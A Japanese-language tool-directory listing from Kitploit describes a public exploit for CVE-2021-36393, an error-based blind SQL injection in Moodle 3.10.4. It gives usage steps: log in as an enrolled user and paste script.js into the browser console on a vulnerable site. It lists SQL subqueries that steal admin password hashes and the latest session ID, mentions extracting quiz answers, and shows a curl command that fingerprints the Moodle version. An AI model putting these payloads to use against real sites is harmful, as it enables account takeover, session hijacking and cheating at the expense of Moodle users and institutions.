Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-36393 — Moodle 3.10.4向けのビットシフト手法を用いたエラーベースのブラインドSQLインジェクション | Kitploit
ツール/GitHubGitHub/stackoverflowexcept1on/cve-2021-36393
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubstackoverflowexcept1on/cve-2021-36393

CVE-2021-36393

Moodle 3.10.4向けのビットシフト手法を用いたエラーベースのブラインドSQLインジェクション

リポジトリを見る
422年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-36393

Moodle 3.10.4 における、ビットシフト手法を用いたエラーベースのブラインドSQLインジェクション。

攻撃者による任意のデータベースクエリの実行を可能にします。例えば、以下の情報を盗み出すことができます。

  • データベースからテストの回答

    script.js ファイルを編集し、/mod/quiz/attempt.php?attempt=...&cmid=... ルートで実行します。

  • ユーザーのパスワードハッシュ:

    root@kitploit:~
    (SELECT password FROM mdl_user WHERE id = 2 LIMIT 1)
    
  • ユーザーセッション:

    root@kitploit:~
    (SELECT sid FROM mdl_sessions ORDER BY id DESC LIMIT 1)
    

使用方法

ログインして、少なくとも1つのコースに登録されている必要があります。次に、script.js のコードをブラウザコンソールにコピーし、脆弱なバージョンのMoodleがインストールされているWebサイト上で実行します。

インストールされているMoodleのバージョンを確認する方法

root@kitploit:~
DOMAIN="example.com"
curl -s https://$DOMAIN/lib/upgrade.txt | head
ツールをダウンロード